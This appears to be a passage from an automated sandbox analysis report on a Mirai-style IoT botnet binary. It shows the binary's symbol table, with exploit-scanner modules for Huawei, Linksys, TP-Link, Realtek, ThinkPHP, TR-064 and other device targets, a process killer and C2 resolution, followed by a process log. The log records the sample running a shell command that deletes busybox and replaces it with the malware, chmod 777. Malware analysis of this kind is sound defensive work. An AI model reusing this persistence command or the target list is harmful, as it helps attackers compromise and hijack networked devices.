                              huawei_init.symtab0x19f182844FUNC<unknown>DEFAULT2
                              huawei_rsck.symtab0x448d84OBJECT<unknown>DEFAULT12
                              huawei_scanner_pid.symtab0x448d44OBJECT<unknown>DEFAULT12
                              huawei_scanner_rawpkt.symtab0x448e040OBJECT<unknown>DEFAULT12
                              huawei_setup_connection.symtab0x19e44212FUNC<unknown>DEFAULT2
                              id_buf.symtab0x4769032OBJECT<unknown>DEFAULT12
                              index.symtab0x2e5c4524FUNC<unknown>DEFAULT2
                              inet_addr.symtab0x279cc40FUNC<unknown>DEFAULT2
                              inet_aton.symtab0x2ed6c244FUNC<unknown>DEFAULT2
                              inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              init_static_tls.symtab0x2f1b0120FUNC<unknown>DEFAULT2
                              initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              initstate.symtab0x292d8124FUNC<unknown>DEFAULT2
                              initstate_r.symtab0x29544244FUNC<unknown>DEFAULT2
                              ioctl.symtab0x2f684228FUNC<unknown>DEFAULT2
                              ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              isatty.symtab0x2ecd832FUNC<unknown>DEFAULT2
                              isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              jaws.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              jaws_fake_time.symtab0x449404OBJECT<unknown>DEFAULT12
                              jaws_init.symtab0x1ab082680FUNC<unknown>DEFAULT2
                              jaws_init_pid.symtab0x4490c4OBJECT<unknown>DEFAULT12
                              jaws_init_rawpkt.symtab0x4491840OBJECT<unknown>DEFAULT12
                              jaws_rsck.symtab0x449104OBJECT<unknown>DEFAULT12
                              jaws_setup_connection.symtab0x1aa34212FUNC<unknown>DEFAULT2
                              kill.symtab0x240dc92FUNC<unknown>DEFAULT2
                              kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              killer.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              killer_init.symtab0x1b70c248FUNC<unknown>DEFAULT2
                              killer_kill.symtab0x1b58044FUNC<unknown>DEFAULT2
                              killer_mirai_exists.symtab0x1b5ac352FUNC<unknown>DEFAULT2
                              killer_pid.symtab0x449444OBJECT<unknown>DEFAULT12
                              lblink_fake_time.symtab0x447b84OBJECT<unknown>DEFAULT12
                              lblink_init.symtab0x151802856FUNC<unknown>DEFAULT2
                              lblink_rsck.symtab0x447884OBJECT<unknown>DEFAULT12
                              lblink_scanner_pid.symtab0x447844OBJECT<unknown>DEFAULT12
                              lblink_scanner_rawpkt.symtab0x4479040OBJECT<unknown>DEFAULT12
                              lblink_setup_connection.symtab0x150ac212FUNC<unknown>DEFAULT2
                              libc-cancellation.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              libc-lowlevellock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              libc-tls.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              linksys.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              linksys_fake_time.symtab0x449784OBJECT<unknown>DEFAULT12
                              linksys_init.symtab0x1b8d82604FUNC<unknown>DEFAULT2
                              linksys_rsck.symtab0x4494c4OBJECT<unknown>DEFAULT12
                              linksys_scanner_pid.symtab0x449484OBJECT<unknown>DEFAULT12
                              linksys_scanner_rawpkt.symtab0x4495040OBJECT<unknown>DEFAULT12
                              linksys_setup_connection.symtab0x1b804212FUNC<unknown>DEFAULT2
                              listen.symtab0x27b2828FUNC<unknown>DEFAULT2
                              listen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              lockdown.symtab0x4768c4OBJECT<unknown>DEFAULT12
                              lseek64.symtab0x2fef8124FUNC<unknown>DEFAULT2
                              main.symtab0x1c4582460FUNC<unknown>DEFAULT2
                              main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              main_pid.symtab0x476b44OBJECT<unknown>DEFAULT12
                              malloc.symtab0x27da42436FUNC<unknown>DEFAULT2
                              malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              malloc_trim.symtab0x2908848FUNC<unknown>DEFAULT2
                              memchr.symtab0x2e438280FUNC<unknown>DEFAULT2
                              memcpy.symtab0x262d44212FUNC<unknown>DEFAULT2
                              memmove.symtab0x25cf01508FUNC<unknown>DEFAULT2
                              mempcpy.symtab0x2fe1432FUNC<unknown>DEFAULT2
                              mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              memrchr.symtab0x2e890256FUNC<unknown>DEFAULT2
                              memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              memset.symtab0x2737c416FUNC<unknown>DEFAULT2
                              methods.symtab0x447604OBJECT<unknown>DEFAULT12
                              methods_len.symtab0x4475c1OBJECT<unknown>DEFAULT12
                              mmap.symtab0x2b7e8108FUNC<unknown>DEFAULT2
                              mmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              mremap.symtab0x2b85c104FUNC<unknown>DEFAULT2
                              mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              munmap.symtab0x2b8cc92FUNC<unknown>DEFAULT2
                              munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              mylock.symtab0x4453024OBJECT<unknown>DEFAULT11
                              mylock.symtab0x4454824OBJECT<unknown>DEFAULT11
                              nanosleep.symtab0x2b98c72FUNC<unknown>DEFAULT2
                              nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              netlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              netlink_fake_time.symtab0x449c84OBJECT<unknown>DEFAULT12
                              netlink_init.symtab0x1cec83144FUNC<unknown>DEFAULT2
                              netlink_init_pid.symtab0x449944OBJECT<unknown>DEFAULT12
                              netlink_init_rawpkt.symtab0x449a040OBJECT<unknown>DEFAULT12
                              netlink_range.symtab0x444ec36OBJECT<unknown>DEFAULT11
                              netlink_rsck.symtab0x449984OBJECT<unknown>DEFAULT12
                              netlink_setup_connection.symtab0x1cdf4212FUNC<unknown>DEFAULT2
                              next_start.1332.symtab0x44bb84OBJECT<unknown>DEFAULT12
                              nuuo.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              nuuo_fake_time.symtab0x44a004OBJECT<unknown>DEFAULT12
                              nuuo_init.symtab0x1dbe42780FUNC<unknown>DEFAULT2
                              nuuo_rsck.symtab0x449d04OBJECT<unknown>DEFAULT12
                              nuuo_scanner_pid.symtab0x449cc4OBJECT<unknown>DEFAULT12
                              nuuo_scanner_rawpkt.symtab0x449d840OBJECT<unknown>DEFAULT12
                              nuuo_setup_connection.symtab0x1db10212FUNC<unknown>DEFAULT2
                              object.4768.symtab0x4470c24OBJECT<unknown>DEFAULT12
                              open.symtab0x2a884132FUNC<unknown>DEFAULT2
                              opendir.symtab0x24608228FUNC<unknown>DEFAULT2
                              opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              p.4751.symtab0x444840OBJECT<unknown>DEFAULT11
                              parse_config.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              parse_request.symtab0x199dc108FUNC<unknown>DEFAULT2
                              pending_connection.symtab0x4498c1OBJECT<unknown>DEFAULT12
                              pgid.symtab0x449904OBJECT<unknown>DEFAULT12
                              prctl.symtab0x24140104FUNC<unknown>DEFAULT2
                              prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              prefix.6476.symtab0x3319012OBJECT<unknown>DEFAULT4
                              program_invocation_name.symtab0x446144OBJECT<unknown>DEFAULT11
                              program_invocation_short_name.symtab0x446104OBJECT<unknown>DEFAULT11
                              qual_chars.6485.symtab0x331a820OBJECT<unknown>DEFAULT4
                              raise.symtab0x2a5a8264FUNC<unknown>DEFAULT2
                              raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              rand.symtab0x291d816FUNC<unknown>DEFAULT2
                              rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              rand_alphastr.symtab0x1e760300FUNC<unknown>DEFAULT2
                              rand_init.symtab0x1e71080FUNC<unknown>DEFAULT2
                              rand_next.symtab0x1e6c080FUNC<unknown>DEFAULT2
                              rand_str.symtab0x1e88c248FUNC<unknown>DEFAULT2
                              random.symtab0x291f0108FUNC<unknown>DEFAULT2
                              random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              random_poly_info.symtab0x33e4040OBJECT<unknown>DEFAULT4
                              random_r.symtab0x293bc152FUNC<unknown>DEFAULT2
                              random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              randtbl.symtab0x44560128OBJECT<unknown>DEFAULT11
                              rawmemchr.symtab0x2fe34188FUNC<unknown>DEFAULT2
                              rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              read.symtab0x2a98c132FUNC<unknown>DEFAULT2
                              readdir.symtab0x247a4184FUNC<unknown>DEFAULT2
                              readdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              readdir64.symtab0x2bc58188FUNC<unknown>DEFAULT2
                              readdir64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              readlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              realloc.symtab0x28854916FUNC<unknown>DEFAULT2
                              realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              realtek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              realtek_init.symtab0x1ea582724FUNC<unknown>DEFAULT2
                              realtekscanner_fake_time.symtab0x44a484OBJECT<unknown>DEFAULT12
                              realtekscanner_rsck.symtab0x44a1c4OBJECT<unknown>DEFAULT12
                              realtekscanner_scanner_pid.symtab0x44a184OBJECT<unknown>DEFAULT12
                              realtekscanner_scanner_rawpkt.symtab0x44a2040OBJECT<unknown>DEFAULT12
                              realtekscanner_setup_connection.symtab0x1e984212FUNC<unknown>DEFAULT2
                              recv.symtab0x27b4492FUNC<unknown>DEFAULT2
                              recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              recvfrom.symtab0x27ba096FUNC<unknown>DEFAULT2
                              recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              register-atfork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              remove.symtab0x248c888FUNC<unknown>DEFAULT2
                              remove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              resolv_entries_free.symtab0x1f4fc56FUNC<unknown>DEFAULT2
                              resolv_lookup.symtab0x1f5341296FUNC<unknown>DEFAULT2
                              resolve_cnc_addr.symtab0x1c304136FUNC<unknown>DEFAULT2
                              resolve_func.symtab0x444e84OBJECT<unknown>DEFAULT11
                              rindex.symtab0x2e7d0192FUNC<unknown>DEFAULT2
                              rmdir.symtab0x2b9dc88FUNC<unknown>DEFAULT2
                              rmdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              rt_sigaction.symtab0x2b46c104FUNC<unknown>DEFAULT2
                              sbrk.symtab0x2ba3c108FUNC<unknown>DEFAULT2
                              sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              scanner_init.symtab0x1c38c204FUNC<unknown>DEFAULT2
                              select.symtab0x2421884FUNC<unknown>DEFAULT2
                              select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              send.symtab0x27c0092FUNC<unknown>DEFAULT2
                              send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              sendto.symtab0x27c5c96FUNC<unknown>DEFAULT2
                              sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              setjmp.symtab0x2b4dc4FUNC<unknown>DEFAULT2
                              setsid.symtab0x2427480FUNC<unknown>DEFAULT2
                              setsid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              setsockopt.symtab0x27cbc44FUNC<unknown>DEFAULT2
                              setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              setstate.symtab0x2925c124FUNC<unknown>DEFAULT2
                              setstate_r.symtab0x29638276FUNC<unknown>DEFAULT2
                              sigaction.symtab0x2b364264FUNC<unknown>DEFAULT2
                              sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              sigjmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              sigprocmask.symtab0x2bab0172FUNC<unknown>DEFAULT2
                              sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              sleep.symtab0x2a6b8336FUNC<unknown>DEFAULT2
                              sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              socket.symtab0x27ce836FUNC<unknown>DEFAULT2
                              socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              spec_and_mask.6484.symtab0x331bc16OBJECT<unknown>DEFAULT4
                              spec_base.6475.symtab0x331a07OBJECT<unknown>DEFAULT4
                              spec_chars.6481.symtab0x3321821OBJECT<unknown>DEFAULT4
                              spec_flags.6480.symtab0x332308OBJECT<unknown>DEFAULT4
                              spec_or_mask.6483.symtab0x331cc16OBJECT<unknown>DEFAULT4
                              spec_ranges.6482.symtab0x331e09OBJECT<unknown>DEFAULT4
                              sprintf.symtab0x2492052FUNC<unknown>DEFAULT2
                              sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              srand.symtab0x29354104FUNC<unknown>DEFAULT2
                              srandom.symtab0x29354104FUNC<unknown>DEFAULT2
                              srandom_r.symtab0x29454232FUNC<unknown>DEFAULT2
                              srv_addr.symtab0x476b816OBJECT<unknown>DEFAULT12
                              stat.symtab0x242cc116FUNC<unknown>DEFAULT2
                              stat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              static_dtv.symtab0x47140512OBJECT<unknown>DEFAULT12
                              static_map.symtab0x4764852OBJECT<unknown>DEFAULT12
                              static_slotinfo.symtab0x47340776OBJECT<unknown>DEFAULT12
                              stderr.symtab0x4462c4OBJECT<unknown>DEFAULT11
                              stdin.symtab0x446244OBJECT<unknown>DEFAULT11
                              stdout.symtab0x446284OBJECT<unknown>DEFAULT11
                              strchr.symtab0x2e5c4524FUNC<unknown>DEFAULT2
                              strchrnul.symtab0x2e990260FUNC<unknown>DEFAULT2
                              strchrnul.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strcspn.symtab0x2ea9460FUNC<unknown>DEFAULT2
                              strcspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strdup.symtab0x2796456FUNC<unknown>DEFAULT2
                              strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strerror_r.symtab0x27838300FUNC<unknown>DEFAULT2
                              strlen.symtab0x27584120FUNC<unknown>DEFAULT2
                              strncmp.symtab0x2ead0244FUNC<unknown>DEFAULT2
                              strncmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strnlen.symtab0x275fc244FUNC<unknown>DEFAULT2
                              strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strpbrk.symtab0x2ec9072FUNC<unknown>DEFAULT2
                              strpbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strrchr.symtab0x2e7d0192FUNC<unknown>DEFAULT2
                              strspn.symtab0x2ebc484FUNC<unknown>DEFAULT2
                              strspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strstr.symtab0x276f0288FUNC<unknown>DEFAULT2
                              strstr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strtok.symtab0x279a440FUNC<unknown>DEFAULT2
                              strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strtok_r.symtab0x2ec18120FUNC<unknown>DEFAULT2
                              strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              strtol.symtab0x2eeb420FUNC<unknown>DEFAULT2
                              strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              sysconf.symtab0x29bc81140FUNC<unknown>DEFAULT2
                              sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              system.symtab0x2b1b0348FUNC<unknown>DEFAULT2
                              system.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              table.symtab0x476c856OBJECT<unknown>DEFAULT12
                              table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              table_init.symtab0x1fb9c260FUNC<unknown>DEFAULT2
                              table_key.symtab0x445104OBJECT<unknown>DEFAULT11
                              table_lock_val.symtab0x1fa6c152FUNC<unknown>DEFAULT2
                              table_retrieve_val.symtab0x1fa4440FUNC<unknown>DEFAULT2
                              table_unlock_val.symtab0x1fb04152FUNC<unknown>DEFAULT2
                              tcgetattr.symtab0x2ecf8108FUNC<unknown>DEFAULT2
                              tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              thinkphp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              thinkphp_fake_time.symtab0x44a804OBJECT<unknown>DEFAULT12
                              thinkphp_init.symtab0x1fd742808FUNC<unknown>DEFAULT2
                              thinkphp_init_pid.symtab0x44a4c4OBJECT<unknown>DEFAULT12
                              thinkphp_init_rawpkt.symtab0x44a5840OBJECT<unknown>DEFAULT12
                              thinkphp_rsck.symtab0x44a504OBJECT<unknown>DEFAULT12
                              thinkphp_setup_connection.symtab0x1fca0212FUNC<unknown>DEFAULT2
                              time.symtab0x2434040FUNC<unknown>DEFAULT2
                              time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              times.symtab0x2bb5c40FUNC<unknown>DEFAULT2
                              times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              totolink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              totolink_fake_time.symtab0x44ab84OBJECT<unknown>DEFAULT12
                              totolink_init.symtab0x209402840FUNC<unknown>DEFAULT2
                              totolink_rsck.symtab0x44a884OBJECT<unknown>DEFAULT12
                              totolink_scanner_pid.symtab0x44a844OBJECT<unknown>DEFAULT12
                              totolink_scanner_rawpkt.symtab0x44a9040OBJECT<unknown>DEFAULT12
                              totolink_setup_connection.symtab0x2086c212FUNC<unknown>DEFAULT2
                              tplink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              tplink_fake_time.symtab0x44af04OBJECT<unknown>DEFAULT12
                              tplink_init.symtab0x2152c2820FUNC<unknown>DEFAULT2
                              tplink_rsck.symtab0x44ac44OBJECT<unknown>DEFAULT12
                              tplink_scanner_pid.symtab0x44ac04OBJECT<unknown>DEFAULT12
                              tplink_scanner_rawpkt.symtab0x44ac840OBJECT<unknown>DEFAULT12
                              tplink_setup_connection.symtab0x21458212FUNC<unknown>DEFAULT2
                              tr064.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              tr064_fake_time.symtab0x44b284OBJECT<unknown>DEFAULT12
                              tr064_init.symtab0x221042764FUNC<unknown>DEFAULT2
                              tr064_rsck.symtab0x44afc4OBJECT<unknown>DEFAULT12
                              tr064_scanner_pid.symtab0x44af84OBJECT<unknown>DEFAULT12
                              tr064_scanner_rawpkt.symtab0x44b0040OBJECT<unknown>DEFAULT12
                              tr064_setup_connection.symtab0x22030212FUNC<unknown>DEFAULT2
                              tvt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              tvt_fake_time.symtab0x44b604OBJECT<unknown>DEFAULT12
                              tvt_init.symtab0x22ca42916FUNC<unknown>DEFAULT2
                              tvt_rsck.symtab0x44b304OBJECT<unknown>DEFAULT12
                              tvt_scanner_pid.symtab0x44b2c4OBJECT<unknown>DEFAULT12
                              tvt_scanner_rawpkt.symtab0x44b3840OBJECT<unknown>DEFAULT12
                              tvt_setup_connection.symtab0x22bd0212FUNC<unknown>DEFAULT2
                              type_codes.symtab0x331ea24OBJECT<unknown>DEFAULT4
                              type_sizes.symtab0x3320812OBJECT<unknown>DEFAULT4
                              unknown.1356.symtab0x332b814OBJECT<unknown>DEFAULT4
                              unlink.symtab0x2bb8c88FUNC<unknown>DEFAULT2
                              unlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              unsafe_state.symtab0x445e020OBJECT<unknown>DEFAULT11
                              update_bins.symtab0x239ec400FUNC<unknown>DEFAULT2
                              update_process.symtab0x145cc8FUNC<unknown>DEFAULT2
                              updating.symtab0x449804OBJECT<unknown>DEFAULT12
                              util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              util_atoi.symtab0x23b7c376FUNC<unknown>DEFAULT2
                              util_isalpha.symtab0x2392c40FUNC<unknown>DEFAULT2
                              util_isdigit.symtab0x2395420FUNC<unknown>DEFAULT2
                              util_itoa.symtab0x23cf4264FUNC<unknown>DEFAULT2
                              util_local_addr.symtab0x23968132FUNC<unknown>DEFAULT2
                              util_memcpy.symtab0x238d844FUNC<unknown>DEFAULT2
                              util_strcat.symtab0x2383876FUNC<unknown>DEFAULT2
                              util_strcpy.symtab0x2388484FUNC<unknown>DEFAULT2
                              util_strlen.symtab0x2380848FUNC<unknown>DEFAULT2
                              util_zero.symtab0x2390440FUNC<unknown>DEFAULT2
                              vfork.symtab0x2f15c76FUNC<unknown>DEFAULT2
                              vsnprintf.symtab0x24954164FUNC<unknown>DEFAULT2
                              vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              w.symtab0x44a144OBJECT<unknown>DEFAULT12
                              wait4.symtab0x2bbec100FUNC<unknown>DEFAULT2
                              wait4.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              wcrtomb.symtab0x2c10876FUNC<unknown>DEFAULT2
                              wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              wcsnrtombs.symtab0x2c178192FUNC<unknown>DEFAULT2
                              wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              wcsrtombs.symtab0x2c15428FUNC<unknown>DEFAULT2
                              wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              write.symtab0x2a908132FUNC<unknown>DEFAULT2
                              x.symtab0x44a084OBJECT<unknown>DEFAULT12
                              xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              y.symtab0x44a0c4OBJECT<unknown>DEFAULT12
                              z.symtab0x44a104OBJECT<unknown>DEFAULT12
                              Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                              System Behavior

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:/tmp/86xklcDnGU.elf
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/bin/sh
                              Arguments:sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/86xklcDnGU.elf bin/busybox; chmod 777 bin/busybox"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/usr/bin/rm
                              Arguments:rm -rf bin/busybox
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/usr/bin/mkdir
                              Arguments:mkdir bin
                              File size:88408 bytes
                              MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/usr/bin/mv
                              Arguments:mv /tmp/86xklcDnGU.elf bin/busybox
                              File size:149888 bytes
                              MD5 hash:504f0590fa482d4da070a702260e3716

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/usr/bin/chmod
                              Arguments:chmod 777 bin/busybox
                              File size:63864 bytes
                              MD5 hash:739483b900c045ae1374d6f53a86a279

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
                              Start date (UTC):26/05/2024
                              Path:/tmp/86xklcDnGU.elf
                              Arguments:-
                              File size:4379400 bytes
                              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
                              Start time (UTC):09:00:53
